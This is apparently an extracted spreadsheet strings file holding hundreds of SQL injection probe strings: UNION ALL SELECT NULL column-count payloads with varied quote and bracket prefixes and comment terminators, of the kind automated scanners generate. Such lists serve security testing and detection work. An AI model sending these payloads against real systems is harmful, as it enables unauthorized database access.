    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "RIrV" LIKE "RIrV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "wWLa" LIKE "wWLa</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Nfyn" LIKE "Nfyn</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "LXMg" LIKE "LXMg</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "MKQl" LIKE "MKQl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "opzq" LIKE "opzq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "rWRS" LIKE "rWRS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "pHWY" LIKE "pHWY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "aVKo" LIKE "aVKo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "tUdy" LIKE "tUdy</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "slUt" LIKE "slUt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "fLKE" LIKE "fLKE</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "TSgI" LIKE "TSgI</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "paeQ" LIKE "paeQ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "OsJC" LIKE "OsJC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "zogT" LIKE "zogT</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "oPuJ" LIKE "oPuJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "CKWs" LIKE "CKWs</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "OGOq" LIKE "OGOq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ySEo" LIKE "ySEo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "OUrV" LIKE "OUrV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "tzCq" LIKE "tzCq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "mBTW" LIKE "mBTW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "RhhB" LIKE "RhhB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "LxsM" LIKE "LxsM</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "zItO" LIKE "zItO</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Wgnp" LIKE "Wgnp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "mmfy" LIKE "mmfy</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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( 8606 = 8606</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8037 = 8037</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 9568 = 9568</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6465 = 6465</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3537 = 3537</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</si>
  <si>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( 9905 = 9905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</si>
  <si>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( 2234 = 2234</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</si>
  <si>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( 3449 = 3449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</si>
  <si>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( 5986 = 5986</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</si>
  <si>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( 9660 = 9660</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  7965 = 7965</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  9686 = 9686</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3673 = 3673</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1096 = 1096</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  252 = 252</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</si>
  <si>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89 = 89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</si>
  <si>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3449 = 3449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</si>
  <si>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2695 = 2695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</si>
  <si>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8346 = 8346</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</si>
  <si>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2698 = 2698</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8052 = 8052</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4120 = 4120</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 9461 = 9461</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8213 = 8213</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5507 = 5507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</si>
  <si>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( 55 = 55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</si>
  <si>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( 9777 = 9777</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</si>
  <si>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( 4724 = 4724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</si>
  <si>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( 546 = 546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</si>
  <si>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( 4631 = 4631</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'aqLK' = 'aqLK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'jHUx' = 'jHUx</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'lCpZ' = 'lCpZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'fXPr' = 'fXPr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'jsyu' = 'jsyu</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'fOkE' = 'fOkE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'IKsc' = 'IKsc</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'tNFM' = 'tNFM</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'FRdx' = 'FRdx</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</si>
  <si>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'voft' = 'voft</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HJxk' = 'HJxk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'aLHE' = 'aLHE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'pRAL' = 'pRAL</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Nofx' = 'Nofx</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'hUTm' = 'hUTm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'LlsG' = 'LlsG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'stCa' = 'stCa</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'rwfh' = 'rwfh</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</si>
  <si>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'wOXj' = 'wOXj</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</si>
  <si>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'Xfgd' = 'Xfgd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ZouZ' = 'ZouZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dAiR' = 'dAiR</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'hbCB' = 'hbCB</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'SjGf' = 'SjGf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'QARl' = 'QARl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'lstx' = 'lstx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'kHcd' = 'kHcd</t>
  </si>
  <si>
